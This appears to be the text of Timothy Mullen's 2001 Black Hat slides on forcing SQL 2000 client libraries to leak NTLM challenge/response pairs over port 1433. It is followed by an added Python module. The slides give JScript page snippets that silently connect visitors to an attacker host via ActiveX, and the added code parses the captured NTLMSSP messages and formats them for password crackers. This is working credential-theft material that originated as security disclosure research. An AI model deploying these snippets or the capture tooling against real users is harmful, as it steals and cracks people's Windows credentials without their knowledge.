Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…

Timothy M. Mullen, AnchorIS.Com, Inc. [email protected]
Timothy Mullen, AnchorIS.Com, Blackhat Vegas 2001

The Culprit: SQL2000 Super Sockets Lib
• New functions in dbnetlib.dll!
• Supports TCP/IP sockets, encryption, authentication, etc.
• Default library on workstations that have the SQL 2000 client utilities installed (MSDE as well?).

Backgrounders…
• SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts).
• Integrated Authentication (NTLM creds) needed Named Pipes.
• Named Pipes required 139/445 open to the authenticating system.

Backgrounders… cont.
• Integrated Authentication has _always_ been the recommended configuration.
• 139/445 has long been blocked at the router (if not, you are a yum-yum).
• Many server-to-server apps authenticate over TCP 1433 because it is “safe”.

The Skinny
• DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets, default port 1433.
• The LM/NTLM challenge/response pairs can now be sent out via 1433 (or other ports, if changed).

The Problem
• Many routers, though specifically blocking 139/445, still allow established traffic out; i.e. 1433 outbound is free to pass.
• Many have 1433 explicitly open for application support, server-to-server queries, etc.

The Sting
• Client-side ODBC connections can specify the target server, authentication type, and the library to use.
• Web sites can request that the client perform ADODB recordset requests, as well as other tasks.
• HTML email as well.

Somewhat Lame Example
• Web site with the following script:

```javascript
// Page script (IE/JScript). Opens an ADO connection to the attacker's host with
// Integrated Security=SSPI, so the logged-on user's NTLM challenge/response is
// carried to 10.1.1.1 over TCP 1433 by dbnetlib rather than over 139/445.
conn = new ActiveXObject("ADODB.Connection");
conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
conn.Open();
```

Example Cont…
• User is presented with the “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
• Easily engineered around…

Not So Lame Example
• Let's try this one:

```javascript
// Same trick via the SQL Namespace control (SQL-NS) shipped with the SQL 2000 client
// tools. Initialize() connects to the named server with a trusted (NTLM) connection
// over dbnetlib.dll; no cross-domain data-access prompt appears.
ns = new ActiveXObject("SQLNS.SQLNamespace");
ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
```

What’s the difference?
• SQLNamespace, SQL Distribution Control, and SQL Merge Control are all scriptable, and are marked _safe for scripting_!
• Silently grab the creds for fun and profit!

Live Demo
• Don’t try this at home! Professional driver on closed course.

Thanks!
AnchorIS.Com, HammerofGod
www.anchoris.com, www.hammerofgod.com
Timothy M. Mullen [email protected] [email protected]
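The slides above leave the receiving side implicit: whatever listens on 10.1.1.1:1433 sees the client's NTLM exchange inside the TDS login, exactly as a named-pipes server would have. The following is an added example and not part of the original talk: a small Python parser for the two NTLMSSP messages a rogue listener handles, the CHALLENGE (type 2) it sends with the server challenge it chose, and the AUTHENTICATE (type 3) it gets back carrying user, domain, workstation and the LM/NT responses, plus a formatter for the user::domain:LM:NT:challenge line that NetNTLMv1 crackers take. TDS framing and socket handling are not shown; the sample messages are built by the helper functions here, the 24-byte responses are placeholder bytes rather than real DES outputs, and the names alice, CORP, WS01 and ROGUE are made up for the example.

```python
"""NTLMSSP CHALLENGE/AUTHENTICATE parser.

Added example (not from the original Black Hat 2001 slides): what a rogue
"SQL Server" listening on TCP 1433 receives once a client logs in with
Integrated Security, whether the SSPI blob arrived via named pipes or via
dbnetlib sockets. All sample bytes below are constructed, not captured.
"""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_CHALLENGE = 2
NTLMSSP_AUTHENTICATE = 3
NEGOTIATE_UNICODE = 0x00000001  # strings are UTF-16LE; otherwise OEM (ASCII)


def message_type(msg):
    """Return the NTLMSSP message type, or raise if the signature is wrong."""
    if len(msg) < 12 or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    return struct.unpack_from("<I", msg, 8)[0]


def _read_field(msg, at):
    """Read a security buffer header (u16 len, u16 maxlen, u32 offset); return its bytes."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, at)
    if offset + length > len(msg):
        raise ValueError("field at %d points outside the message" % at)
    return msg[offset:offset + length]


def _string_codec(flags):
    return "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"


def parse_challenge(msg):
    """CHALLENGE (type 2): target name, negotiate flags and the 8-byte server challenge."""
    if message_type(msg) != NTLMSSP_CHALLENGE:
        raise ValueError("not a CHALLENGE message")
    flags = struct.unpack_from("<I", msg, 20)[0]
    return {
        "target": _read_field(msg, 12).decode(_string_codec(flags)),
        "flags": flags,
        "challenge": msg[24:32],
    }


def parse_authenticate(msg):
    """AUTHENTICATE (type 3): who answered and the LM/NT responses they sent."""
    if message_type(msg) != NTLMSSP_AUTHENTICATE:
        raise ValueError("not an AUTHENTICATE message")
    # Flags follow the six field headers; very old clients may omit them.
    flags = struct.unpack_from("<I", msg, 60)[0] if len(msg) >= 64 else NEGOTIATE_UNICODE
    codec = _string_codec(flags)
    return {
        "lm_response": _read_field(msg, 12),
        "nt_response": _read_field(msg, 20),
        "domain": _read_field(msg, 28).decode(codec),
        "user": _read_field(msg, 36).decode(codec),
        "workstation": _read_field(msg, 44).decode(codec),
    }


def netntlmv1_line(challenge, auth):
    """user::domain:LM:NT:challenge, the line format NetNTLMv1 crackers consume."""
    return "%s::%s:%s:%s:%s" % (auth["user"], auth["domain"],
                                auth["lm_response"].hex(), auth["nt_response"].hex(),
                                challenge.hex())


# --- builders, used only to construct the sample messages for this example ---

def _layout(fields, payload_start):
    """Pack security-buffer headers for fields, placing their data from payload_start on."""
    headers, payload = b"", b""
    for data in fields:
        headers += struct.pack("<HHI", len(data), len(data), payload_start + len(payload))
        payload += data
    return headers, payload


def build_challenge(target, challenge, flags=NEGOTIATE_UNICODE):
    """Type 2 with TargetName and an empty TargetInfo; payload starts at offset 48."""
    assert len(challenge) == 8
    heads, payload = _layout([target.encode(_string_codec(flags)), b""], 48)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", NTLMSSP_CHALLENGE)
            + heads[:8] + struct.pack("<I", flags) + challenge + b"\x00" * 8
            + heads[8:] + payload)


def build_authenticate(user, domain, workstation, lm_response, nt_response,
                       flags=NEGOTIATE_UNICODE):
    """Type 3 with six fields, flags and a zero Version; payload starts at offset 72."""
    codec = _string_codec(flags)
    heads, payload = _layout([lm_response, nt_response, domain.encode(codec),
                              user.encode(codec), workstation.encode(codec), b""], 72)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", NTLMSSP_AUTHENTICATE)
            + heads + struct.pack("<I", flags) + b"\x00" * 8 + payload)


if __name__ == "__main__":
    # Constructed sample: made-up challenge, placeholder 24-byte responses
    # (real LM/NT responses are DES outputs over the password hashes; these are not).
    chal_msg = build_challenge("ROGUE", bytes.fromhex("0123456789abcdef"))
    auth_msg = build_authenticate("alice", "CORP", "WS01",
                                  bytes(range(24)), bytes(range(24, 48)))
    chal = parse_challenge(chal_msg)
    auth = parse_authenticate(auth_msg)
    print(netntlmv1_line(chal["challenge"], auth))
```

The parser is transport-agnostic on purpose: the same blobs ride in the TDS LOGIN7 SSPI field over 1433, in SMB over 139/445, or in HTTP NTLM headers, which is why a network ACL on 139/445 alone does not contain the exchange. A client that answers with NTLMv2 sends an NT response longer than 24 bytes (16-byte HMAC followed by the client blob); the field parsing above still works, but the cracker line format for that case is different and is not produced here.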